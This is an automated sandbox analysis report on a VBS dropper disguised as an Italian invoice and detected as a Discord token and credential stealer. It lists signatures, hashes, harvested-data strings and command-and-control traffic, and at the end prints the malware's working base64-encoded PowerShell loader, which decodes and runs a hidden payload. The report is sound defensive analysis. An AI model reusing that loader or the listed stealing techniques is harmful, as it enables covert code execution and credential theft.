Windows Analysis Report
Fattura-24SC-99245969925904728562.vbs

Overview

General Information

Sample name: Fattura-24SC-99245969925904728562.vbs
Analysis ID: 1546109
MD5: 6f5153972552fdc27d794087d11c0f12
SHA1: 2392e3fb23d622dd6ef791b388bd0acadef3f069
SHA256: 577564ce2face042cce2f1f7f2a28c42a96d08b3929e63497da486fd90d295d0
Tags: SPAM-ITAvbsuser-JAMESWT_MHT
Infos:

Detection

Discord Token Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Discord Token Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Creates processes via WMI
Drops VBS files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Powershell is started from unusual location (likely to bypass HIPS)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Fattura-24SC-99245969925904728562.vbs ReversingLabs: Detection: 26%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log Jump to behavior
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1423198807.000000000A040000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005437000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000006386000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.00000000061E6000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: powershell.pdbUGP source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: powershell.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000000.1312087444.00000000003D1000.00000020.00000001.01000000.00000005.sdmp, OSDescription.vbs.exe, 0000000F.00000000.1514068078.0000000000348000.00000020.00000001.01000000.0000000C.sdmp, OSDescription.vbs.exe.13.dr, Fattura-24SC-99245969925904728562.vbs.exe.4.dr
Source: Binary string: protobuf-net.pdb source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then jmp 0A033B28h 7_2_0A033A68
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then jmp 0A033B28h 7_2_0A033A70
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_0A0386F9
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 7_2_0A038700
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 7_2_0A0ED8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 15_2_09CAD8F8
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then jmp 09CE3B28h 15_2_09CE3A68
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then jmp 09CE3B28h 15_2_09CE3A70
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 15_2_09CE8700
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Code function: 4x nop then cmp dword ptr [ebp-20h], 00000000h 15_2_09CE86F9
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49706 -> 185.36.141.107:7702
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49740
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49973
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: 90.168.9.0.in-addr.arpa replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: unknown TCP traffic detected without corresponding DNS query: 185.36.141.107
Source: global traffic DNS traffic detected: DNS query: 90.168.9.0.in-addr.arpa
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1357497221.0000000002C3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1539348684.000000000277E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000048A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://discordapp.com/api/v9/users/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.00000000049F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1632367660.0000000004063000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://icanhazip.com/
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1390938323.0000000005DDC000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1567720148.0000000005909000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp, Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1415758783.0000000008910000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: InstallUtil.exe, 00000009.00000002.1478557094.00000000035FE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003746000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1478557094.0000000003760000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000274E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000003149000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud
barindex
Malicious encrypted Powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
